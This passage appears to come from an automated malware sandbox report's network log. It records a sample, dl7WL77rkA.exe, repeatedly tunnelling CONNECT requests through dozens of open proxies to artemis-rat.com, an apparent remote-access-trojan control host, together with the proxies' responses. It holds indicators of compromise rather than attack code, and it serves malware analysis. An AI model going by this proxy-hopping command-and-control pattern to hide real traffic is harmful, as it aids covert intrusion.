                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2020 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2022 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
979 | 192.168.2.5 | 52615 | 207.180.234.220 | 39737 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:41.620213032 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:42.389347076 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:43.389731884 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:45.202162027 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:48.889749050 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:52.702083111 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
980 | 192.168.2.5 | 52599 | 65.109.152.88 | 8888 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:41.628547907 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.952377081 CET236INHTTP/1.1 503 Service Unavailable
                                                                                                                                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:41 GMT
                                                                                                                                                                                                                                                            Content-Length: 69
                                                                                                                                                                                                                                                            Data Ascii: dial tcp: lookup artemis-rat.com on 127.0.0.1:53: server misbehaving


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            981192.168.2.552574103.231.45.14510803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.628551006 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            982192.168.2.550473162.223.116.75803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.636621952 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.701844931 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.702188969 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:53.702240944 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            983192.168.2.552579112.109.16.5180803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.658297062 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.894119024 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            984192.168.2.55265014.103.26.5380003876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.658514023 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.957457066 CET536INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                            Server: nginx/1.19.2
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:41 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 579
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>500 Internal Server Error</title></head><body><center><h1>500 Internal Server Error</h1></center><hr><center>nginx/1.19.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            985192.168.2.55258138.156.75.1480803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.659401894 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.112646103 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            986192.168.2.55263945.71.184.13480803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.668133974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.119857073 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            987192.168.2.55259843.133.136.20888003876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.668317080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            988192.168.2.55265143.129.228.4678913876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.668422937 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            989192.168.2.55264751.89.173.40265453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.668545008 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.389410973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.389781952 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:45.389647961 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:49.207736015 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:52.999226093 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:56.701992989 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:31:04.201786041 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            990192.168.2.5526211.194.236.22950053876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:41.668704987 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:42.236263037 CET | 39 | IN | HTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            991192.168.2.552253171.247.244.10310803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:41.668704987 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            992192.168.2.5526608.213.128.9066663876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:41.669089079 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            993192.168.2.55262637.235.53.20867893876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:41.669666052 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:41.988926888 CET | 339 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                            Server: squid/4.7
                                                                                                                                                                                                                                                            Mime-Version: 1.0
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:41 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html;charset=utf-8
                                                                                                                                                                                                                                                            Content-Length: 5
                                                                                                                                                                                                                                                            X-Squid-Error: TCP_RESET 0
                                                                                                                                                                                                                                                            Vary: Accept-Language
                                                                                                                                                                                                                                                            Content-Language: en
                                                                                                                                                                                                                                                            X-Cache: MISS from proxy.wakoopa.com
                                                                                                                                                                                                                                                            Via: 1.1 proxy.wakoopa.com (squid/4.7)
                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                            Data Raw: 72 65 73 65 74
                                                                                                                                                                                                                                                            Data Ascii: reset


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            994192.168.2.552633202.83.102.8380803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:41.674791098 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:42.001502991 CET | 340 | IN | HTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.12.2
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:41 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Content-Length: 173
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            995192.168.2.552673173.249.29.24391233876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:41.674926996 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:41.995232105 CET | 39 | IN | HTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            996192.168.2.552641114.132.202.7880803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:41.675188065 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:42.205944061 CET | 84 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:42 GMT
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            997192.168.2.552138140.227.228.202101013876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:41.675380945 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.952500105 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            998192.168.2.552683121.159.146.251803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.675856113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            999192.168.2.5526893.127.62.252803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.679362059 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.985160112 CET116INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:41 GMT
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                                            Content-Length: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1000192.168.2.552624143.64.8.2180803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.686583996 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1001192.168.2.550459103.76.148.16180803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.689030886 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.809940100 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1002192.168.2.552697207.180.234.220428233876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.689294100 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.405060053 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.355494022 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1003192.168.2.55258645.251.231.11356783876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.694314003 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


